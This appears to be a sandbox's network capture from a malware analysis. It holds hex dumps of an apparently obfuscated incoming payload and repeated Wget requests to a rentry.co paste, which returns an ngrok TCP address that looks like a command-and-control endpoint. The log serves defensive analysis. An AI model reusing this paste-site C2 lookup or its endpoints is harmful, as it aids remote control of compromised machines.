2024-08-05 09:57:28 UTC	1378	IN	Data Raw: d6 1c ba 20 b9 86 9e db 4e 7e ec 52 a1 17 b7 6a fb 79 ee 27 3d 75 df 4a d4 f7 f2 30 be 0f 64 57 77 0a 8d 22 c2 bd 76 82 f1 f1 9e 8b 8a b5 29 bd 53 0b 38 ad 77 fa 81 a6 8d b5 82 8d f1 f1 1e ce 0a 5d 41 7c df 76 45 4f 3f b0 19 4e 51 31 c7 0d 19 35 1a c4 aa 41 89 e3 a9 cd 9e 1f fc 75 69 32 09 f0 02 65 1d 71 d9 0b 62 29 2d bb 12 16 29 1f fc 6d 69 2a 09 f2 46 a9 fb a0 52 47 0e fa a5 08 95 fe ad 9b bb f5 81 a6 8d b5 82 8d f1 f1 1a ce 0a 5d 69 78 df 66 45 47 3b b0 09 4e 59 35 c7 0d 19 1d 1a c4 aa 41 29 bd 12 16 29 1f fe 7d 69 42 f8 78 4e 41 3d d5 f6 34 46 79 2d bb 1a 16 49 12 44 f9 05 e1 15 5d 0e 09 b6 f5 ba 28 b9 86 9e b9 12 16 41 1f b0 7d 69 42 41 79 4e 41 b6 79 76 67 0e fa a5 08 95 fe ad 9b bb f5 81 a6 8d b5 02 c8 71 19 72 0b cf 3d 45 28 1e bb 35 73 67 71 c4 Data Ascii: N~Rjy'=uJ0dWw"v)S8w]A\|vEO?NQ15Aui2eqb)-)mi*FRG]ixfEG;NY5A))}iBxNA=4Fy-ID](A}iBAyNAyvgqr=E(5sgq
2024-08-05 09:57:28 UTC	1378	IN	Data Raw: 56 09 b4 69 76 57 0e f0 2d 14 5e 7a e2 bb 4f 71 c6 3e 65 31 06 ca 71 19 12 af 08 79 61 30 1e bb 64 88 24 c3 4d 22 c2 44 99 12 c7 3d 52 32 48 31 ec 3d 20 04 9b 57 9f c8 b7 95 be 92 68 09 b6 69 76 17 0e f2 6c 8b 05 c8 61 bf c9 3e 4d 6a 09 f0 0a 65 1d c2 06 63 66 31 ea 3d f0 61 9b 57 9f 80 47 6a 41 31 cd 85 05 fe 9e 8b 8a b5 29 b9 02 16 71 1f fe 75 69 62 09 fa a2 09 75 fa 16 63 7e 79 61 30 56 7a ec 52 05 28 4d 6a 09 f0 0a 65 0d 75 df 42 70 68 61 30 1e bb 25 73 5f 71 c0 6f ab 69 4e 41 75 b4 16 63 66 35 ec 3d c8 22 61 57 3b b4 48 3d 51 79 4e 09 b6 69 76 1f 0e f2 2d 14 06 da 79 57 77 39 05 e9 85 31 8d 8d f1 f1 9e 8b 8a b5 ad fc 9a fe ad 9b bb f5 81 a6 8d b5 02 c8 71 19 72 0b cf 3d 45 28 1e bb 35 73 67 71 c4 26 65 71 06 c0 d1 c5 52 47 46 31 a6 74 72 02 61 57 77 Data Ascii: VivW-^zOq>e1qya0d$M"D=R2H1= Whivla>Mjecf1=aWGjA1)quibuc~ya0VzR(MjeuBpha0%s_qoiNAucf5="aW;H=QyNiv-yWw91qr=E(5sgq&eqRGF1traWw
2024-08-05 09:57:28 UTC	1378	IN	Data Raw: ca f5 6a 51 3c 3d 52 0f cf 31 49 78 dd 76 45 67 3f b2 c1 4e 59 78 4e 41 75 b4 1a 77 0e f2 25 14 66 7a ea db 53 19 4c 6a 41 31 c7 09 05 75 d9 03 62 49 29 bb da 16 49 56 77 39 05 e3 09 39 06 ca 79 19 62 0f cd f5 45 00 57 32 61 1f fe 71 05 22 ca 3d 6a 71 75 b6 de 63 7e 78 61 30 1e bb 29 0f 3f b2 09 4e 71 f2 c2 65 81 3d 52 47 cf 31 09 78 dd 76 45 67 3f b2 01 4e 19 31 c7 09 4d 75 d9 03 62 39 ea 70 02 b9 b1 1f fc b5 69 62 40 79 4e a9 4b 30 52 47 c3 b9 14 35 bf da 60 57 77 71 c6 2e 65 39 c5 01 69 75 d9 cb 62 41 60 30 56 7a e8 1b 53 19 0c d3 45 79 4e 41 7c 85 52 57 46 79 ea e0 1e b9 2d 73 4f c6 d9 4e 51 78 4e 41 75 b4 d6 63 de 79 61 30 1e b9 25 73 37 b2 0d 3e 05 f2 8e 09 b6 69 76 37 0e f2 ed 14 ce 32 61 57 9f a0 fc 6b 41 31 c5 05 19 4d 1a 24 06 45 29 bb da 16 f9 Data Ascii: jQ<=R1IxvEg?NYxNAuw%fzSLjA1ubI)IVw99ybEW2aq"=jquc~xa0)?Nqe=RG1xvEg?N1Mub9pib@yNK0RG5`Wwq.e9iubA`0VzSEyNA\|RWFy-sONQxNAucya0%s7>iv72aWkA1M$E)
2024-08-05 09:57:28 UTC	1378	IN	Data Raw: c6 2a 55 40 0a 65 05 4b 5d fe 39 79 61 30 a9 27 e5 e9 76 39 7e aa aa 53 06 ca 79 19 62 cc 06 65 29 bb 1a 16 31 1f 74 f1 05 e1 80 f2 02 65 05 fc b3 45 cd b0 ea 34 5e 7a ea 1b 53 69 05 69 89 31 c5 80 75 bc 96 cf 46 79 61 f3 9a fe ad 9b bb f5 81 a6 8d b5 82 8d f1 f1 1a ce 0a 5d 69 78 d5 de 29 1f fc 7d 69 3a 09 f0 0a 65 15 75 d1 3b 62 51 61 45 53 db 7f 56 77 39 05 e1 05 5d 66 c2 45 21 52 33 6d 31 ea 74 72 1a 29 dc 77 b2 0d 42 09 f2 02 65 15 75 51 06 4e 31 e8 74 72 02 24 64 b7 0a 9f 22 ca 3d 6a 69 75 b6 1a 4f b9 2d 45 00 1e b9 25 73 5f 71 c6 22 11 91 7a e0 3d 3d 1a cc 02 5d 49 78 d5 4a 71 57 03 53 8a 2e 65 59 4e 41 3d 3d b9 4d cd 3d 45 10 a9 f2 e8 13 53 19 05 e1 05 5d 66 ca 7d 25 6b 03 62 59 1c 0a 1e 51 25 73 57 71 c6 26 65 51 06 ca 74 2d 1a c4 7a b8 61 44 75 Data Ascii: *U@eK]9ya0'v9~Sybe)1teE4^zSii1uFya]ix)}i:eu;bQaESVw9]fE!R3m1tr)wBeuQN1tr$d"=jiuO-E%s_q"z==]IxJqWS.eYNA==M=ES]f}%kbYQ%sWq&eQt-zaDu
2024-08-05 09:57:28 UTC	1378	IN	Data Raw: 9e ef 4d 6a 41 31 c5 15 19 0d 1a cc 0a 5d 31 d8 b4 cc 9e a8 3f b0 09 4e 69 f2 0a 65 65 be b2 48 cf 3d 45 68 dd 76 45 0f fe 7d 69 4e ca 3d 6a 19 c2 f5 db 03 62 21 e2 4c 72 16 61 23 54 71 c6 2e 65 51 41 f6 3d c2 92 0f de 31 b0 d0 1e b9 b1 1f fc 75 69 42 a9 44 4c 41 3d 75 db 03 62 51 8a f4 1e b9 25 73 5f 36 fa 6a c4 b9 3b 60 84 2b 55 47 46 86 74 8f ee 33 61 ef 76 39 4d 6a 09 12 8e 41 75 b6 1e 63 26 bf 65 31 56 01 a1 bc 39 71 c6 2e 65 51 41 f6 3d b4 16 63 66 f2 25 14 3e 0b 25 73 57 4b 47 e1 05 5d 26 c8 79 19 72 ac 4b f2 25 14 76 7a ea 1b 53 59 8b 6e 40 79 c5 05 19 1d 1a cc 0a 5d 49 78 d5 f3 63 13 fc f9 05 e1 90 31 c5 0d 19 5d ba b4 ec 79 61 bb 12 16 41 1f f4 fd 05 a9 8d b5 82 8d f1 f1 16 ce 0a 5d 41 74 df 76 45 4f 3f b0 19 4e 51 31 c7 0d 19 35 1a c4 aa 51 25 Data Ascii: MjA1]1?NieeH=EhvE}iN=jb!Lra#Tq.eQA=1uiBDLA=ubQ%s_6j;`+UGFt3av9MjAuc&e1V9q.eQA=cf%>%sWKG]&yrK%vzSYn@y]Ixc1]yaA]AtvEO?NQ15Q%
2024-08-05 09:57:28 UTC	1378	IN	Data Raw: 75 1f fc 6d 69 0a 09 7a 9f 09 b6 f7 16 cc 86 31 ea e1 1e b9 2d 73 37 d1 05 c8 40 79 f6 be c2 c2 ad 0f cd 35 45 70 1e 11 a9 1f fc f8 05 e1 0d 5d 76 c8 7c 35 bb 7e b8 86 9e 88 57 32 61 57 3f ba 89 32 82 b5 82 8d f1 f1 9e 8b 8a b5 ad fc 9a fe ad 9b bb f5 05 e3 15 5d 5e 09 b4 71 76 4f 0e fa 8d 28 1e b9 25 73 5f b2 0d 7a c8 7d 6a c2 01 19 52 32 78 31 ea 74 72 1a ea 17 53 ba ad 2a c4 b9 3a 51 75 b6 16 63 66 31 ea 30 dd 72 41 de 73 1d a6 75 09 f2 0a 65 15 b6 12 63 63 f9 61 30 56 b7 a1 23 79 71 c6 2e 65 59 06 ca 3d b6 12 63 cf 7d 45 bb 52 16 29 d4 b3 21 8e a6 8d b5 82 8d f1 f1 9e 8b 8a b5 29 b9 02 16 71 1f fe 75 69 62 09 fa a2 19 75 b6 16 63 2e 31 e2 48 46 32 14 5d cf 38 4d 6a 41 90 eb 40 3d 3d 1a cc 02 5d 09 bb 16 2a 44 57 77 39 4f ef 81 76 ca cc 3d 3d 52 0f cd Data Ascii: umiz1-s7@y5Ep]v\|5~W2aW?2]^qvO(%s_z}jR2x1trS:Qucf10rAsuecca0V#yq.eY=c}ER)!)quibuc.1HF2]8MjA@==]DWw9Ov==R
2024-08-05 09:57:28 UTC	1378	IN	Data Raw: 13 01 a1 ed 76 39 4d 6a 09 f2 02 65 0d 75 d9 03 62 59 9e 20 1e b9 25 73 57 71 ce aa 49 31 c7 05 19 1d b9 96 fe 78 61 30 56 7a e2 93 3f fa 81 a6 8d b5 82 8d f1 f1 9e 8b 8a b5 ad fc 9a fe ad 9b bb f5 05 e3 15 5d 5e 09 b4 71 76 4f 0e f8 8d b8 56 32 61 1f fc bd 69 fa 41 79 4e 09 b6 7d 5a 0f cf 3d 45 68 1e b9 e5 73 e7 39 4d 6a 09 f2 4e f8 35 3d 52 47 0e 12 a8 35 1e bf e5 5f ff 39 4d 6a 09 f0 0a 65 6d 75 d9 03 62 29 e2 48 52 32 14 71 3f ba f1 4e d9 79 4e 41 3d 48 58 80 02 5d 51 31 56 32 61 bc 7f fe 09 4e 71 79 4e 41 3d b6 16 63 76 90 3c 31 56 32 29 dc 33 1d 1d e1 41 31 c5 0d 19 65 1a 44 8e 31 ea f1 1e bb 25 73 5f 71 c6 2e 65 51 cd 79 3d 32 d4 74 47 79 61 78 dd 76 45 7f fc 39 05 e1 0d 5d 16 09 3e f5 1a cc 87 31 e8 74 72 5a db 5f 77 39 4d 22 ca 35 6a 69 d5 ec a4 Data Ascii: v9MjeubY %sWqI1xa0Vz?]^qvOV2aiAyN}Z=Ehs9MjN5=RG5_9Mjemub)HR2q?NyNA=HX]Q1V2aNqyNA=cv<1V2)3A1eD1%s_q.eQy=2tGyaxvE9]>1trZ_w9M"5ji
2024-08-05 09:57:28 UTC	1378	IN	Data Raw: 29 b9 02 16 71 1f fe 75 69 62 09 fa a2 79 75 b6 16 63 06 31 e8 74 72 1a 29 dc 33 1d 05 22 c8 3d 6a 61 75 b6 16 63 66 31 ea 20 1e b9 25 73 5f 71 c6 62 a9 b0 c5 41 3d 75 d1 83 7e ba ad fc 9a fe ad 9b bb f5 81 a6 8d b5 82 8d f1 f1 9e 8b 8a b5 29 b9 02 16 71 1f fe 75 69 62 09 fa a2 79 75 b6 16 63 06 31 e8 74 72 1a 29 dc 33 1d 05 22 c8 3d 6a 61 75 b6 16 63 66 31 ea 20 1e b9 25 73 5f 71 c6 62 a9 00 c5 41 3d 75 d1 83 7e ba ad fc 9a fe ad 9b bb f5 81 a6 8d b5 82 8d f1 f1 9e 8b 8a b5 2d b9 12 16 79 1f fe 6d 69 7a 09 f0 02 65 35 85 ea 57 46 79 89 07 51 32 61 1f 5c d9 05 e1 44 54 58 bb 3d 75 61 83 0e f0 e5 14 f6 22 61 57 3f b2 c9 4e 89 69 4e 41 75 be 92 57 0e f0 25 14 3e 7a a6 13 53 49 4d 6a 41 79 06 ca b9 19 82 57 46 79 29 f1 be 22 29 d2 b7 4d 37 d2 40 79 4e 41 75 Data Ascii: )quibyuc1tr)3"=jaucf1 %s_qbA=u~)quibyuc1tr)3"=jaucf1 %s_qbA=u~-ymize5WFyQ2a\DTX=ua"aW?NiNAuW%>zSIMjAyWFy)")M7@yNAu
2024-08-05 09:57:28 UTC	1378	IN	Data Raw: 8e c3 68 34 56 f2 29 d4 b3 19 16 22 be 5c 72 e5 3c 3d 1a ce 0a 5d 69 78 d5 de 59 ee 60 39 4d 6a be 6c 7e e5 3c 3d d7 87 32 7e d8 32 56 32 61 9a 5e 71 c0 67 b7 65 b4 41 d5 f4 53 47 46 31 ea 74 72 0a 29 de 72 e4 50 90 41 31 c3 05 19 05 1a c4 86 71 29 b9 53 5f 7c ad 77 71 c6 6f 87 64 b4 41 75 b4 57 70 5a 83 61 78 dd 76 45 17 3f b0 48 51 5c 83 4e 86 38 2c 4e bd 46 70 65 30 96 f5 64 5c 6b c3 4d 6b 41 79 4e 86 38 28 4e bd 46 78 61 30 56 8a 69 57 77 39 05 01 81 79 06 cc 30 30 4e bd 46 31 a6 34 57 30 61 57 77 81 45 6a 41 79 06 2a fd 3d 1a cc 4b ac 71 ca 56 7a e8 1b 73 19 f5 62 41 79 4e 09 56 fd 53 0f cd 74 61 21 ac 32 29 de 3b 3d 6d 22 cc 74 0a e7 3c 3d ba b8 b8 86 9e 78 d5 f6 59 94 bb f5 05 e9 ad 51 f7 49 3d 3d 52 af 40 79 61 30 1e b1 a5 7f b4 f5 c4 26 65 71 06 Data Ascii: h4V)"\r<=]ixY`9Mjl~<=2~2V2a^qgeASGF1tr)rPA1q)S_\|wqodAuWpZaxvE?HQ\N8,NFpe0d\kMkAyN8(NFxa0ViWw9y00NF14W0aWwEjAy*=KqVzsbAyNVSta!2);=m"t<=xYQI==R@ya0&eq

Timestamp	Bytes transferred	Direction	Data
2024-08-05 09:57:53 UTC	143	OUT	GET /zsbkz/raw%C3%ABH%02 HTTP/1.1 Host: rentry.co User-Agent: Wget/1.21.4 Accept: / Accept-Encoding: identity Connection: Keep-Alive
2024-08-05 09:57:53 UTC	656	IN	HTTP/1.1 404 Not Found Date: Mon, 05 Aug 2024 09:57:53 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close vary: Origin x-xss-protection: 1; mode=block strict-transport-security: max-age=31536000; includeSubDomains CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VO47pj1QnOifgjbFwzHkPrmMr4AeUWZS8%2BDJYAAyiLQU8gGPNNQeMooWD332b3RSVKVycvrF7bVV5GYS9f1bDrgedmPn%2FfvbZ0tD11qBOq2EZjJaXE8gsxpf%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ae5ecf15e987ca8-EWR
2024-08-05 09:57:53 UTC	713	IN	Data Raw: 31 30 65 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d Data Ascii: 10e2<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" content=
2024-08-05 09:57:53 UTC	1369	IN	Data Raw: 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 Data Ascii: property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta proper
2024-08-05 09:57:53 UTC	1369	IN	Data Raw: 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 22 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 6e 6f 2d 67 75 74 74 65 72 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 31 Data Ascii: e; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0"> <div class="container container-smooth"> <div class="row no-gutters"> <div class="col-1
2024-08-05 09:57:53 UTC	879	IN	Data Raw: 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 61 65 35 65 63 66 31 35 65 39 38 37 63 61 38 27 2c 74 3a 27 4d 54 63 79 4d 6a 67 31 4d 54 67 33 4d 79 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 61 2e 6e 6f 6e 63 65 3d 27 27 3b 61 2e 73 72 63 3d 27 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 73 63 72 69 70 74 73 2f 6a 73 64 2f 6d 61 69 6e 2e 6a 73 27 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 Data Ascii: ment;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8ae5ecf15e987ca8',t:'MTcyMjg1MTg3My4wMDAwMDA='};var a=document.createElement('script');a.nonce='';a.src='/cdn-cgi/challenge-platform/scripts/jsd/main.js';document.getElement
2024-08-05 09:57:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2024-08-05 09:58:14 UTC	133	OUT	GET /zsbkz/raw HTTP/1.1 Host: rentry.co User-Agent: Wget/1.21.4 Accept: / Accept-Encoding: identity Connection: Keep-Alive
2024-08-05 09:58:14 UTC	696	IN	HTTP/1.1 200 OK Date: Mon, 05 Aug 2024 09:58:14 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 23 Connection: close vary: Origin x-xss-protection: 1; mode=block x-content-type-options: nosniff strict-transport-security: max-age=31536000; includeSubDomains Cache-Control: Vary CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M86VPv6MkIR22GXWEUREpZR5NmlZZpgxGBCIU3%2Fqyum90CQHHk28u22YDA6lDXMTReslahg0Sk34fwsZHEKE6MpmcyOZaqcJRscWQ%2FcmVCeQ2O8Q7tQ%2FfVE2vA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ae5ed75ef50435b-EWR
2024-08-05 09:58:14 UTC	23	IN	Data Raw: 30 2e 74 63 70 2e 69 6e 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 37 34 31 Data Ascii: 0.tcp.in.ngrok.io:11741

Timestamp	Bytes transferred	Direction	Data
2024-08-05 09:58:21 UTC	133	OUT	GET /zsbkz/raw HTTP/1.1 Host: rentry.co User-Agent: Wget/1.21.4 Accept: / Accept-Encoding: identity Connection: Keep-Alive
2024-08-05 09:58:21 UTC	696	IN	HTTP/1.1 200 OK Date: Mon, 05 Aug 2024 09:58:21 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 23 Connection: close vary: Origin x-xss-protection: 1; mode=block x-content-type-options: nosniff strict-transport-security: max-age=31536000; includeSubDomains Cache-Control: Vary CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TjD1JX9Nu5Hz9WzcU5efPPLaS0t%2B7yFuVzPwbK%2BAp4%2BFuWLH5n55Fo5zpFeM8kdXN5Jtfd7kpN3VvsmEZsJhzoMw1QC2q64HrVuxBdnOin84YLX5mHCzHTcVNw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ae5ed9e486f7279-EWR
2024-08-05 09:58:21 UTC	23	IN	Data Raw: 30 2e 74 63 70 2e 69 6e 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 37 34 31 Data Ascii: 0.tcp.in.ngrok.io:11741

Timestamp	Bytes transferred	Direction	Data
2024-08-05 09:58:27 UTC	133	OUT	GET /zsbkz/raw HTTP/1.1 Host: rentry.co User-Agent: Wget/1.21.4 Accept: / Accept-Encoding: identity Connection: Keep-Alive
2024-08-05 09:58:28 UTC	698	IN	HTTP/1.1 200 OK Date: Mon, 05 Aug 2024 09:58:28 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 23 Connection: close vary: Origin x-xss-protection: 1; mode=block x-content-type-options: nosniff strict-transport-security: max-age=31536000; includeSubDomains Cache-Control: Vary CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DdvhxEBRmcLHC%2BDrtAOqL9goRR8T4NBQsW20J1jigdvhSPATUlymTYTmuc62CcdL14xdgA4fXCMde%2FGzOVh6ibZ%2FTK0ULyjlMe3EUMrBrszN8n%2BuNKxexQsKpA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ae5edc769a98ce0-EWR
2024-08-05 09:58:28 UTC	23	IN	Data Raw: 30 2e 74 63 70 2e 69 6e 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 31 37 34 31 Data Ascii: 0.tcp.in.ngrok.io:11741

Timestamp	Bytes transferred	Direction	Data
2024-08-05 09:58:35 UTC	143	OUT	GET /zsbkz/raw%C3%ABH%02 HTTP/1.1 Host: rentry.co User-Agent: Wget/1.21.4 Accept: / Accept-Encoding: identity Connection: Keep-Alive
2024-08-05 09:58:35 UTC	658	IN	HTTP/1.1 404 Not Found Date: Mon, 05 Aug 2024 09:58:35 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close vary: Origin x-xss-protection: 1; mode=block strict-transport-security: max-age=31536000; includeSubDomains CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Q%2F9XwaxK4rTBPFffUNL6gGfyy6ZrMibG4acei2Y3UPMpgVN4C34t%2FWSey3oksc%2BC8VUJvjNfoDzxSTF4h2X3UXU85RXRdTUBZKtQKx5nzm66%2FDnwJ0kpnBP2w%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ae5edf619064357-EWR
2024-08-05 09:58:35 UTC	711	IN	Data Raw: 31 30 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 20 46 61 73 74 2c 20 73 69 6d 70 6c 65 20 61 6e 64 20 66 72 65 65 2e 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d Data Ascii: 10e1<!DOCTYPE html><html><head> <meta charset="utf-8"> <title>Error</title> <meta name="description" content="Markdown paste service with preview, custom urls and editing. Fast, simple and free."> <meta name="keywords" content=
2024-08-05 09:58:35 UTC	1369	IN	Data Raw: 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 75 72 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 72 65 6e 74 72 79 2e 63 6f 2f 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 52 65 6e 74 72 79 2e 63 6f 20 2d 20 4d 61 72 6b 64 6f 77 6e 20 50 61 73 74 65 20 53 65 72 76 69 63 65 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4d 61 72 6b 64 6f 77 6e 20 70 61 73 74 65 20 73 65 72 76 69 63 65 20 77 69 74 68 20 70 72 65 76 69 65 77 2c 20 63 75 73 74 6f 6d 20 75 72 6c 73 20 61 6e 64 20 65 64 69 74 69 6e 67 2e 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 Data Ascii: a property="og:url" content="https://rentry.co/" /> <meta property="og:title" content="Rentry.co - Markdown Paste Service" /> <meta property="og:description" content="Markdown paste service with preview, custom urls and editing." /> <meta prop
2024-08-05 09:58:35 UTC	1369	IN	Data Raw: 72 75 65 3b 20 73 63 72 69 70 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 27 64 61 74 61 2d 64 6f 6d 61 69 6e 27 2c 20 68 6e 20 2b 20 27 2c 72 65 6e 74 72 79 27 29 3b 20 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 73 63 72 69 70 74 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 0a 20 20 20 20 0a 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6d 2d 30 20 70 2d 30 22 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 20 63 6f 6e 74 61 69 6e 65 72 2d 73 6d 6f 6f 74 68 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 20 6e 6f 2d 67 75 74 74 65 72 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c Data Ascii: rue; script.setAttribute('data-domain', hn + ',rentry'); document.head.appendChild(script);</script> </head><body class="m-0 p-0"> <div class="container container-smooth"> <div class="row no-gutters"> <div 